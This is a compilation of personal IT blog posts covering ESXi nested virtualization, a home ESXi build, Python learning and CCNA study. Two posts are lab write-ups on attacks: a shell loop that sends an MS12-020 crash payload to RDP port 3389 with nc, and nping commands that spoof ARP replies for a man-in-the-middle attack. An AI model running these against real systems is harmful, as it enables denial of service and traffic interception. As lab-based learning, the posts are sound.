Nested Virtualization

One of my main goals of migrating from ESXi 3.5 to ESXi 5 was to be able to run 64-bit operating systems in virtual machines,  one of them being Windows Server 2008 R2, which would give me the ability to run Hyper-V.  Little did I know that there is an issue that somewhat prevents this.

As most know, Hyper-V is Microsoft's virtualization platform, the successor to Virtual Server.  It is not as robust as VMware even though Microsoft is gaining ground with the new version to be released with Windows Server 2012.  My main goal is to learn at least the basics of Hyper-V.

When I set out to install the Hyper-V role in my Windows Server 2008 R2 VM, I figured I'd be able to add the role and be done with it.  However, when I tried I was greeted with an error message stating that virtualization was not supported by the CPU.

After checking with HWINFO32 that the virtualization instruction set was detected inside the VM, I did some Googling to see if I could find the root cause of the error.  This is when I learned about nested virtualization.

Nested virtualization is essentially running a VM inside of another VM.  This isn't supported natively by VMware, but it can be done with a few hacks.  Here's what I did:

1) Added vhv.allow = "TRUE", which allows Virtualized Hardware Virtualization, to the /etc/vmware/config file on ESXi 5 host (host reboot is not required):

2) Added the following, which are CPUid bits, to the .vmx (/vmfs/volumes/(name of datastore/(name of VM) file for the VM:

3) Powered on the VM.
4) Nested VM!

The performance isn't the greatest.  But it works.

Thanks to the following sites for instructions:
http://thephuck.com/virtualization/installing-windows-server-8-hyper-v-3-in-esxi-5/
http://www.virtuallyghetto.com/2011/07/how-to-enable-support-for-nested-64bit.html

MS12-020 Exploit

I'm still relatively new to security and lately I've been trying out various exploits, one of them being the MS12-020 vulnerability in Remote Desktop.

The details of the vulnerability can be found here and the proof of concept code that can be used to exploit the vulnerability can be found here.

To test the proof-of-concept code I used a VM running Windows 7 Enterprise with no updates and a VM running Debian Linux 6 x64.

I wrote a short shell script to execute the exploit multiple times until the target machine crashed.

#!/bin/sh
while true;
do
        echo `nc <SERVER IP> 3389 < termdd_1.dat`
done

Running the exploit:

Crashing the box:

It's a "script kiddie" exploit.  But everyone has to start some where. :)

Man-In-The-Middle With nping

nmap is known as the world's best port-scanner.  However there are a few lesser known tools that are installed with nmap.  They are; ncat (an improved version of netcat), nping (a packet crafter), and ndiff (like *unix diff, but for nmap scans). 

This post will focus on simulating a LAN based Man-In-The-Middle (MITM) attack using nping.

A LAN based MITM attack exploits a well known security flaw in the Address Resolution Protocol, or ARP.  ARP is used to map a layer 3 IP address to a layer 2 MAC address so that hosts on the same network can transmit traffic to each other.

Unlike DNS, ARP accepts updates at any time and can't be configured to only accept secured updates.  This means that one can send a spoofed ARP packet mapping the IP address of another host to the MAC address of their own host, thus causing all communication intended for the other hosts IP to be sent to the spoofer's host. 

A MITM attack sends spoofed ARP packets to two different hosts with the other hosts IP, but with the attacker's MAC address.  For example:

Host A ------------------ Attacker ------------------ Host B
1.1.1.1                           MAC : X                        2.2.2.2
MAC : A                                                            MAC : B

Attacker sends a ARP packet to Host A with it's MAC address (X) and Host B's IP address (2.2.2.2).  Attacker also sends a ARP packet to Host B with it's MAC address and Host A's IP address.  This populates the ARP cache of each host with the IP address of each other, but the MAC address associated with the IP address is that of Attacker.  This allows all traffic sent between the two hosts to be pass through Attacker, hence the term "Man-in-the-middle".

MITM attacks allow the attacker to intercept or sniff the traffic between two hosts.  The security implications of this are obvious and is particularly dangerous on wireless networks.

nping is a tool that allows one to generate custom packets.  It allows one to specify the source IP address, destination IP address, source MAC, destination MAC and may other TCP/IP, Ethernet and UDP features.

I used nping in my ESXi environment to simulate a MITM attack.  This is how I did it:

Hosts:
Teal (Debian 6.0) - 10.0.0.2
blue (Debian 6.0) - 10.0.0.1 - attacker
DC-03 (Windows Server 2008 R2) - 10.0.0.3

These VMs were connected to a vswitch on a private network segmented from my home network.

1) Ran nping from blue against DC-03 and Teal specifying blue's MAC address as the source for ARPs for DC-03 and Teal respectively:

Command sent to TEAL:
nping --arp-type arp-reply --source-mac 00:0c:29:43:ec:da --source-ip 10.0.0.3 -c 9999 10.0.0.2

Command sent to DC-03:
nping --arp-type arp-reply --source-mac 00:0c:29:43:ec:da --source-ip 10.0.0.2 -c 9999 10.0.0.3

-c 9999 means run the command 9999 times.

Here`s what it looked like in action:
nping to Teal:

nping to DC-03:

 

Here the resulting ARP tables on each host:

 Teal :

 DC-03 :

I then ran ncat in listening mode on Teal to simulate a web server and then installed Apache.  I installed IIS 7 on DC-03.  I tested connecting from one host to the other while using tcpdump on blue to monitor the traffic.  The results are below:

Using Firefox on DC-03 to connect to Teal:

Using Lynx on Teal to connect to DC-03:

 

Using Telnet on DC-03 to connect to the ncat listener on Teal and then connecting using IE9 (odd results):

tcpdump on blue of the DC-03 to Teal session:

tcpdump on blue of the Teal to DC-03 session:

As you can see, I was able to monitor the traffic going between Teal and DC-03 on blue using tcpdump.

There are much better tools for performing LAN based MITM attacks (ettercap, Cain and Abel).  But utilizing packet crafters is a good way to get a underlying understanding of how things work.

ESXi 5 Build

In 2009 I was a victim of the recession like many people were.

During my time of unemployment I elected to pursue some IT certifications to enhance my skill set.  One of these was the Microsoft Certified IT Professional:  Enterprise Administration, or MCITP: EA for short.

I elected to go the self-study route and used the Microsoft Press Self-Study kit (link to amazon page).  At this point in time Windows Server 2008 R2 had just recently been released so the exam and study materials were based on Windows Server 2008.

I won’t go too in-depth to what the kit contained as that is not the focus of this post.  The important fact is that the kit contained lab exercises that required multiple servers and clients.

Microsoft suggests going the virtualization route by using Virtual PC or Virtual Server, both of which require and valid Windows license.  I elected to use VMware ESXi 3.5 as it is more prevalent in the market place now and it is free.

The original machine I used was a off-lease HP tower with a P4 3.4 Ghz processor, 4GB RAM and 700GB hard drive space.  ESXi 3.5 installed after purchasing a SATA controller card that was on the VMware Whitebox HCL (link to site).  The whole build cost me just under $300 Canadian.

Due to the fact that the P4 is a 32bit processor, I was unable to use ESXi 4 or use 64-bit VMs.

After almost two years of use, I saw the need to be able to run 64-bit VMs.   

After a bit of research I selected the components for a ESXi 5 white-box build.  VMware extended the HCL for ESXi 5 and I was able to build a box with the following components:

AMD Phenom II X6 2.6 GHz CPU

Asus M4A88T-M (AMD 880G chipset)

12GB DDR3 PC3-10666 RAM

1TB 7200 Hard drive

24x DVD-RW

The build and install went flawless.  The only issue I had was with an add-on Realtek 8139A NIC that is supposed to be supported.  When I connected to the host via SSH and ran lspci, it showed up, but ESXi was unable to see it.  So I am just running with the integrated NIC (Realtek 8138) for now.

I added a 500GB hard drive from the old ESXi 3.5 server and expanded the datastore to a total size of 1.5TB.

Instead of re-installing all of my VMs from scratch.  I used VMware Converter to move the VMs from the old host to the new one.  It’s sort of like VMotion, but the VMs have to be powered off, and it can’t be done on the fly.  But it’s much more efficient than transferring the files via SSH.

After verifying all VMs were working, I upgraded or installed VMware Tools on all the guests that I was currently using.  ESXi 5 has an in-place upgrade for older versions of VMware Tools.

I then proceeded to upgrade the ESXi server to the latest build.

After finding the VMware Infrastructure Update Client was no longer supported in ESXi 5, I proceeded to do a bit of Googling until I found some instructions on how to download and install the latest patches.

After going to VMware’s downloads section and selecting the patch, you have to download it locally to your machine since the version of wget that comes with ESXi 5 doesn’t support https.  After doing so you must scp it to the datastore on the ESXi host.  You then post the host in maintenance mode and run the following command:

esxcli software vib install --maintenance-mode  --depot /vmfs/volumes/datastore1/ESXi500-XXXXXXXXXXXX.zip

Replace the Xs with the patch number.

When in maintenance mode all VMs must be shutdown.

If the patch requires a reboot, it will tell you during the installation process.

First Solo Python Script

As a follow up to the last post, I've been learning Python from various books and have been soley following the exercises in the books themselves and not venturing out on my own until now.

I decided to try writing a simple script that installs nmap 6.01 from source on a Unix/Linux platform.  You can find it here.  The script was just an exercise to see if I could actually get it working.  I may make additions/modifications to it later on.

Learning Python

Over the past year or so I've been learning Python.  I have a Computer Science degree but strayed away from programming.  However, after developing an interest in IT Security I found that it is very beneficial to know how to at least read code let alone write it.

Python is very popular in the Security field and is gaining popularity in the Unix/Linux systems administration field to the point where it is directly competing with Perl.

I've been learning from the following books; Python Programming: An Introduction to Computer Science, Practical Programming: An Introduction to Computer Science Using Python, and Core Python Programming.

In terms of self-study.  If you have no background in programming or Computer Science I would recommend starting with Python Programming and moving on to Core Python.  If you have a programming/Computer Science background you can start with Core Python.

Python Programming teaches Computer Science using Python as the language.  Core Python assumes one already has programming experience.  Core Python focuses on the language and then applications using the language.

As for Practical Programming.  I found this title to be very poor for self-study and the authors seem to make many assumptions to the point where they just throw code at you without thorough explanation.

Cisco CCNA

I recently passed the ICND2 exam thus completing the Cisco Certified Network Associate (CCNA) certification.

I chose the two exam route since I am relatively new to networking and I wanted to be able to focus on each exam's topic separately.

It took about three months of preparation for the ICND1 exam and another six months for the ICND2 exam.  This is a relatively long time,  but I had other material I was working on and I wanted to make sure that I passed the exams.

As my goal is to obtain a position in IT security, a base knowledge of networking is required.  The CCNA is a recognized certification that will give you a base knowledge in routing ,switching, TCP/IP and UDP.  Be forewarned that it covers networking from a Cisco perspective, so the emphasis is on configuring Cisco devices and not networking in general.

A solid understanding of the OSI model, TCP/IP, and UDP is required for security professionals.  Good sources for this material are Wireshark Network Analysis, NMAP Network Scanning, and TCP/IP Guide.  All of these titles I plan on reading myself.

Below are the following resources that I used to prepare for the exam:

From Cisco Press :
CCNA 640-802 Official Cert Library 
CCNA Flash Cards and Exam Practice Pack  
31 Days Before Your CCNA Exam 
CCNA Portable Command Guide
CCNA 640-802 Network Simulator

Cisco Packet Tracer 5.3 (do a google search to find it and various labs)
CBT Nuggets CCNA 

The Official Certification library and the CCNA Flash Cards titles come with practice tests from Boson.  I found these tests to be actually harder than the actual exam.  This combined with the 200+ labs that came with the Network Simulator should be more than enough to pass the exams.  The other titles I used as insurance.

My advise for test takers is to read the books cover to cover and go through the practice material in the Appendices on the CDs.  Also learn how to subnet very quickly.  You should be able to subnet in 20 seconds or less.  Many of the problems on the exam require subnetting, even those that aren't specific to subnetting.  Keep doing the Boson exams until you can pass them consistently.  Finally, make sure you spend a significant amount of time doing labs.  Whether you build a physical lab or use the simulators.  There are questions that aren't simulator questions but ask you about various IOS commands.  So make sure you're familiar with them.